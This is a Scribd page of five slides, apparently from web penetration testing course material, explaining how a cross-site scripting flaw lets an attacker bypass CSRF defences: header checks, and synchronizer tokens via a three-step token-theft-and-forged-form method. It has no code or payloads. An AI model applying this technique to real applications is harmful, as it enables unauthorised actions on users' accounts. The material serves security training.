Scribd
Upload
31 views5 pages

Red PPT Template-46-50

The document discusses how cross-site scripting (XSS) vulnerabilities can be used to bypass cross-site request forgery (CSRF) defenses. Technically, once an XSS flaw is exploited, all CSRF defenses except challenge-response are useless since the attacker is now in the same origin. The document outlines how synchronizer tokens, referer and origin headers can be bypassed by stealing a valid anti-CSRF token using an XSS vulnerability.

Uploaded by

instagramsuppoycb
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
31 views5 pages

Red PPT Template-46-50

The document discusses how cross-site scripting (XSS) vulnerabilities can be used to bypass cross-site request forgery (CSRF) defenses. Technically, once an XSS flaw is exploited, all CSRF defenses except challenge-response are useless since the attacker is now in the same origin. The document outlines how synchronizer tokens, referer and origin headers can be bypassed by stealing a valid anti-CSRF token using an XSS vulnerability.

Uploaded by

instagramsuppoycb
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

5.4.

1 Bypassing CSRF Defenses with XSS

Anti-CSRF token mechanisms, and other CSRF prevention


techniques, have been introduced to mitigate security
attacks involving Cross-site Request Forgery, however,
not stacked attacks that involve Cross-site Scripting
(XSS).

A single XSS flaw is like a storm that overwhelms the entire


CSRF protection system.
WAPTXv2: Section 01, Module 05 - Caendra Inc. © 2020 | p.46
5.4.1 Bypassing CSRF Defenses with XSS

Technically, once we have exploited an XSS flaw, we are in


the same origin of the CSR. All defenses against CSRF,
except Challenge-Response mechanisms, are useless.

Synchronizer token, Checking the Referer header and


Checking the Origin header can all be bypassed.
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#synchronizer-token-pattern
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#verifying-origin-with-standard-headers

WAPTXv2: Section 01, Module 05 - Caendra Inc. © 2020 | p.47


5.4.1.1 Bypassing Header Checks

Checking Referer and Origin headers simply means that the


request must come from a proper origin.

Bypassing these types of defense measures are


straightforward as long as we have effectively exploited an
XSS vulnerability.

WAPTXv2: Section 01, Module 05 - Caendra Inc. © 2020 | p.48


5.4.1.2 Bypassing Anti-CSRF Token

The scenario changes when the security measure is


implemented using the Synchronizer Token Pattern. To
circumvent this protection, we need to hijack the Anti-CSRF token
from a valid form and then use the token stolen in our forged
form.

Once the XSS flaw has been detected there are generally two
scenarios that play out. The first, and "luckiest" occurs when XSS
and CSRF-protected forms are contained on the same page. The
second possibility is that the XSS flaw is located in another part
of the web application.
WAPTXv2: Section 01, Module 05 - Caendra Inc. © 2020 | p.49
5.4.1.2 Bypassing Anti-CSRF Token

Bypassing an Anti-CSRF based mechanism there are


generally 2 - 3 steps required, depending on where it is
located the XSS.
1. 3.
Request a valid form Forge the form with the
(with a valid token) stolen token

Useless if the 2.
XSS is in the Extract the valid token
same page from the source code

WAPTXv2: Section 01, Module 05 - Caendra Inc. © 2020 | p.50

You might also like